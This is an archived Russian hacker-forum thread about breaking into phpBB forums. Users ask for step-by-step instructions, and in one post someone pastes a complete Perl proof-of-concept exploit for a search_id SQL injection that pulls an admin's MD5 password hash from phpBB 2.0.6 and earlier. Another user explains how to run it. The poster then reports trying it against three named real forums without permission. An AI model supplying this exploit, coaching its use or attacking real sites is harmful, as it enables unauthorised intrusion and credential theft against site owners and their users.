Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

phpBB

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> phpBB
Имя
Сообщение << Старые топики   Новые топики >>
phpBB - 2005-04-28 20:19:17   
tw-tw

Сообщений: 126
Оценки: 0
Присоединился: 2005-03-07 23:20:49
Везде пишут про взлом этого форума, но негде нет конкретно. Может кто знает ссылчку на статью, где это описывается, только просто, полно, и подробно-ПРАКТИКА
Спасибо
Post #: 1
phpBB - 2005-04-28 21:35:09   
cybermind

Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13
http://www.securitylab.ru/?ID=1671&Search_String=phpBB
Post #: 2
phpBB - 2005-04-29 14:34:38   
Nightfly

Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
а на базе дикого количества багтраков родить сплоит(коих и так полно - гуглЪ рулит) мозгов не хватает?
Post #: 3
phpBB - 2005-04-29 20:14:06   
tw-tw

Сообщений: 126
Оценки: 0
Присоединился: 2005-03-07 23:20:49
Я же не ссылку на эксплоит просил, а ссылку на то как его применить.
Post #: 4
phpBB - 2005-04-29 22:12:34   
cybermind

Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13
quote:

—————-<BR>Цитата: Дата:29.04.2005 20:14:06, Автор:tw-tw ::
Я же не ссылку на эксплоит просил, а ссылку на то как его применить.
—————-


Там всё подробно расписано!
Ну каменты ещё почитай: там таких, как ты полно.
Post #: 5
phpBB - 2005-04-30 14:19:47   
Nightfly

Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
Киддисы млин… есть готовый експлоит, есть куча описаний, еще пошаговая инструкция нужна?
Post #: 6
phpBB - 2005-05-04 19:34:09   
tw-tw

Сообщений: 126
Оценки: 0
Присоединился: 2005-03-07 23:20:49
Да
Post #: 7
phpBB - 2005-05-05 16:28:33   
[rapt0r]

Сообщений: 105
Оценки: 0
Присоединился: 2005-03-10 20:13:31
securitylab тебе в руки… там все написано…
Post #: 8
phpBB - 2005-05-08 01:06:36   
menvix

Сообщений: 6
Оценки: 0
Присоединился: 2005-05-08 01:03:14
Вот те в помощь качай
А вообще так ищешь про это весь инет расписан
Post #: 9
RE: phpBB - 2009-07-15 22:34:43.516666   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
люди я нашел код эксплойта для phpBB 2.0.9. Объясните как им пользоваться. Помоему в коде ошибка, он не фурычит.

#!/usr/bin/perl -w use IO::Socket; ##&nbsp;&nbsp;&nbsp; PROOF-OF-CONCEPT ##&nbsp;&nbsp;&nbsp; * work only with mysql ver &gt; 4.0 ##&nbsp;&nbsp;&nbsp; * work only with post #1 ## ##&nbsp;&nbsp;&nbsp; Example: ##&nbsp;&nbsp;&nbsp; C:\&gt;r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2 ##&nbsp;&nbsp;&nbsp; [~] prepare to connect... ##&nbsp;&nbsp;&nbsp; [+] connected ##&nbsp;&nbsp;&nbsp; [~] prepare to send data... ##&nbsp;&nbsp;&nbsp; [+] OK ##&nbsp;&nbsp;&nbsp; [~] wait for response... ##&nbsp;&nbsp;&nbsp; [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99 ## if (@ARGV &lt; 4) { print "\n\n"; print "|****************************************************************|\n"; print " r57phpbb.pl\n"; print " phpBB v&lt;=2.06 search_id sql injection exploit (POC version)\n"; print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n"; print " coded by f3sy1 &amp; 1dt.w0lf // 16/12/2003\n"; print " Usage: r57phpbb-poc.pl &lt;server&gt; &lt;folder&gt; &lt;user_id&gt; &lt;search_id&gt;\n"; print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n"; print " [~] &lt;server&gt; - server ip\n"; print " [~] &lt;folder&gt; - forum folder\n"; print " [~] &lt;user_id&gt; - user id (2 default for phpBB admin)\n"; print " [~] &lt;search_id&gt; - play with this value for results\n"; print "|****************************************************************|\n"; print "\n\n"; exit(1); } $success = 0; $server = $ARGV[0]; $folder = $ARGV[1]; $user_id = $ARGV[2]; $search_id = $ARGV[3]; print "[~] prepare to connect...\n"; $socket = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$server", PeerPort =&gt; "80") || die "$socket error $!"; print "[+] connected\n"; print "[~] prepare to send data...\n"; # PROOF-OF-CONCEPT reguest... print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat (char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108, 116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109, 97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108, 105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34) ,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48, 59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34, 59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54, 58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99, 104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n"; print "[+] OK\n"; print "[~] wait for response...\n"; while ($answer = &lt;$socket&gt;) { if ($answer =~ /;highlight=/) { $success = 1; @result=split(/;/,$answer); @result2=split(/=/,$result[1]); $result2[1]=~s/&amp;amp/ /g; print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n"; } } if ($success==0) {print "[-] exploit failed =(\n";} ## o---[ RusH security team | www.rsteam.ru | 2003 ]---o # milw0rm.com [2003-12-21]
Подскажите куда ставить айпишник и директорию сервера, который надо взломать.
(Я лол, лолам надо помогать =))

Post #: 10
RE: phpBB - 2009-07-16 10:42:45.010000   
timecot

Сообщений: 5
Оценки: 0
Присоединился: 2009-07-13 16:26:34.730000
использование : r57phpbb-poc.pl <server> <folder> <user_id> <search_id>
последние два не обязательны
Post #: 11
RE: phpBB - 2009-07-16 14:49:58.283333   
daniel_1024

Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
спасибо…я разобрался с этим…
я с помощью этого эксплоита пробывал ломануть неск. форумов:
http://forum.ntfs.ru
http://www.cotka.ru/forum
http://forum.chita.ru
 
но во всех этих случаях эксплой в конце выдает exploit failed. Айпи и прочие параметры  указаны правильно….может быть что при версии 2.0.6 форум пропатчился и защитился от этого эксплойта ?
Post #: 12
Страниц:  [1]
Все форумы >> [В Сети] >> phpBB







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.